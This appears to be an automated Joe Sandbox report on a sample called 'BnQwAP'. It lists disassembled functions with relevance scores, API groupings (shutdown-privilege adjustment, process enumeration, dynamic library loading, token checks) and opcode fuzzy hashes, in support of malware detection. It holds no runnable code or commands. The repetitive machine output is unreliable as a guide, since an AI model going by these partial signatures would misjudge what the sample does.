                                                                                                                    • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                                    • Instruction ID: 115cd8b2f700199085c73994225f75b3c1252866861c55efbbeeed2e2b93b1ff
                                                                                                                    • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                                    • Instruction Fuzzy Hash: 39510426B0825281EB40EF12D4486697B90BF89FE8F4C4535DE5EA7796CF3DD804CB80
                                                                                                                    Function 00007FF65601793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: !$VUUU$fmod
                                                                                                                    • API String ID: 1757819995-2579133210
                                                                                                                    • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                                    • Instruction ID: f69740b2f9e8ea94a7a7f77b59390052b04d153f9afb6cedfa60c6ef568e2f0d
                                                                                                                    • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                                    • Instruction Fuzzy Hash: 49B12721E1CFC444D6B38A3455513BAB259AFAA394F14C332E94E76BA0DF3DA5C6C700
                                                                                                                    Function 00007FF6560184C0 Relevance: 7.1, APIs: 4, Instructions: 1071COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1286766494-0
                                                                                                                    • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                                                                    • Instruction ID: 417b7a6433e6c9a30ba5e191b3630e08a3aa6d71afabbbb5f6e84682495c3601
                                                                                                                    • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                                                                    • Instruction Fuzzy Hash: ACA29232A086428BEB658F24DA901BD37A5FB4578CF184135DB8D97B98DF3EE619C700
                                                                                                                    Function 00007FF65605D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 2163645468-3733053543
                                                                                                                    • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                    • Instruction ID: d54232b928e9f5cf2485cc6ec307c26019a03d3dc69f3380d63f217084ec60ff
                                                                                                                    • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                    • Instruction Fuzzy Hash: F711E332B2860682E724DB26E64117E6262FF90754F4C4136E54DE3AE9EF3DD80AC740
                                                                                                                    Function 00007FF656005BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF656005C43
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                    • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                    • Instruction ID: d1c4c4578dbb6a13fccb5c02ccd76ee9022ccbe8e8d76a4d8ef626a01efd54d8
                                                                                                                    • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                    • Instruction Fuzzy Hash: 50114832A14B429BEB459B22E7543B933A5FB44359F884135C64DD3A90EF3EE4B8CB10
                                                                                                                    Function 00007FF656077634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                    • Instruction ID: 92e783b56402c2674cfbd8100360121609f2297324b1280762533f52ca9dd402
                                                                                                                    • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                    • Instruction Fuzzy Hash: A0E01221915B0681EF158B65E91437823E1FB18B4CF8C4435D91DD6354EF7DD6ADC300
                                                                                                                    Function 00007FF656076320 Relevance: 6.3, APIs: 4, Instructions: 255COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2733932498-0
                                                                                                                    • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                                    • Instruction ID: d6d8f72b65e08ccbf4de9e10727ef5c6b6ff7367f1051228b9d9edecfc61f69a
                                                                                                                    • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                                    • Instruction Fuzzy Hash: 14B19C26B14B5681EB50DF26D5946BD2760FB88FD8F4D5036DE0EA7796CE39E888C300
                                                                                                                    Function 00007FF65605BE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1083639309-0
                                                                                                                    • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                    • Instruction ID: c817447232394a56b68950ea9487f23e4c461cb1b1e8ce2bd499e5e7f679add9
                                                                                                                    • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                    • Instruction Fuzzy Hash: 2941D836A18A8292EB50EF61E5541BE7360FB94B88F584032FE4DA3755DF7DE909CB00
                                                                                                                    Function 00007FF6560002C4 Relevance: 5.7, Strings: 2, Instructions: 3180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: DEFINE$x
                                                                                                                    • API String ID: 0-4035502692
                                                                                                                    • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                                                                    • Instruction ID: ab1443846bad5d601739cef749e6bd4f15c3a1fc23989cb2b247ca07b6b9c779
                                                                                                                    • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                                                                    • Instruction Fuzzy Hash: 2B53D372B146528AE770CF25C5406BD37A1FB14B89F588136CE8DA7784EFBAE949C700
                                                                                                                    Function 00007FF655FF3C20 Relevance: 5.3, APIs: 3, Instructions: 832COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    • Opcode ID: da6e29006f01bd698c6eac7bc6c5edd526e300c14b6c3d3e53a12b26179e677e
                                                                                                                    • Instruction ID: 751cbcd3bb12cb72282ada02862086553bd7da066fbf526e8e932b26e3005cb0
                                                                                                                    • Opcode Fuzzy Hash: da6e29006f01bd698c6eac7bc6c5edd526e300c14b6c3d3e53a12b26179e677e
                                                                                                                    • Instruction Fuzzy Hash: 7482AF3AA08A4286EB64CF15E54867973A4FF54F88F580135DA4EE3B94DF7EE845CB00
                                                                                                                    Function 00007FF656011750 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1502251526-0
                                                                                                                    • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                                                    • Instruction ID: 99c91bade5b5a83e938e3e3aae925ba0403cc976dcf39e0f1f8ae20593a51517
                                                                                                                    • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                                                    • Instruction Fuzzy Hash: B7D1DC32B1968687D738CF15E6846AAB7A1F784788F588134DB4EA7B44DF3DE845C700
                                                                                                                    Function 00007FF656066428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                    • Instruction ID: 1fd080e5a593188b7b3ad0e4204d1f6af82405a9036d13a3203adb3d0531037c
                                                                                                                    • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                    • Instruction Fuzzy Hash: 58519C36708A4282EB54DF26D1942AC7760FB84F98F484232CB5D937A5CF7DE599CB00
                                                                                                                    Function 00007FF6560657B0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                                                                    • Instruction ID: adb9dd0524f805be66a92c8c7374af2e491adfb6df8532c870eb92cc02f8e4d3
                                                                                                                    • Opcode Fuzzy Hash: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                                                                    • Instruction Fuzzy Hash: 6C31A436A08B8686E7119F25E48426E7760FF84F98F148131EB8E93B61DF7DD446CB00
                                                                                                                    Function 00007FF65604D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2278415577-0
                                                                                                                    • Opcode ID: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                                                                    • Instruction ID: 4ac46dbaa322712b4e4c8ed2bedeb0f9ed6cd4165f40aa7b7894e06142fb57b1
                                                                                                                    • Opcode Fuzzy Hash: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                                                                    • Instruction Fuzzy Hash: 0921D072608A8185DB14DF26E64026D77A1FB88BD4F488534DF4C53758CFB8D15AC704
                                                                                                                    Function 00007FF65605BF80 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 33631002-0
                                                                                                                    • Opcode ID: c1a660ba6107f8f40afc549c60c0281f1e634fa1b65154c4abfb297250e0dda3
                                                                                                                    • Instruction ID: d65a4860d1fd2a205ca3092f3c538ec8bbde1f1a5d9110d32c1c9380e98b170d
                                                                                                                    • Opcode Fuzzy Hash: c1a660ba6107f8f40afc549c60c0281f1e634fa1b65154c4abfb297250e0dda3
                                                                                                                    • Instruction Fuzzy Hash: 7E219D7361878087E3508F21E18439A73A0F384BA4F548236DB9C43B98DF7DC859CB40
                                                                                                                    Function 00007FF65604D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                                    • Instruction ID: e7fb42871923545ae3ebb38f8a8f5316c0eb4e602e5d8bd7e2abe647b01cdbb3
                                                                                                                    • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                                                    • Instruction Fuzzy Hash: D2014C736247818FE7208F21E4993AA33A0F75476EF440929E64986A98CF7DC258CB80
                                                                                                                    Function 00007FF656022F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                                                                    • Instruction ID: 01fa6fb15d309c5e119a8de1d9349932186d6f17d7b6b2581a06a481aa25121b
                                                                                                                    • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                                                                    • Instruction Fuzzy Hash: 82316512B1869144EB709F62DE0467AA791FF50BE8F488635EE6DA7BC4DE3DD40AC300
                                                                                                                    Function 00007FF65601BEF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
